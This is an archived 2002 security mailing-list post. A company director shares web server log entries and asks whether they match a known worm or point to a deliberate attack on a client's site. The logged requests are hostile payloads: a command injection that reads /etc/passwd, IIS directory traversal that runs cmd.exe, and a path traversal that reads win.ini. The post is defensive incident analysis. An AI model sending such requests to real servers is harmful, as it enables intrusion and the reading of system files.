Hi all, I have in my possession a log file that implicates a business acquaintance, who to say the least, might have the attitude to mount an offensive. The log file contains many entries like:- 404 /cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output _number=10 /perl/ 1 - /cgi-bin/test-cgi.bat?|ver 1 - /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: 1 - /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini 1 - /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\\ My question to everyone out there is would anyone be able to tell me if this kind of attack has the fingerprints of any known software/viruses in the field or is it a deliberate attempt to gain access to my clients site? Your thoughts are welcomed Paul Mahoney Director FiberStarr Systems www.fiberstarr.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Dec 05 2002 - 19:23:25 PST